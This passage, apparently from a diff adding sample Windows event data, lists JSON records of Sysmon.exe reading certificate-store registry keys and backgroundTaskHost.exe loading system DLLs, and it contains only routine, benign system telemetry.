"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "biwinrt.dll", + "image_path": "C:\\Windows\\System32\\biwinrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ContentDeliveryManager.Background.dll", + "image_path": "C:\\Windows\\SystemApps\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\ContentDeliveryManager.Background.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 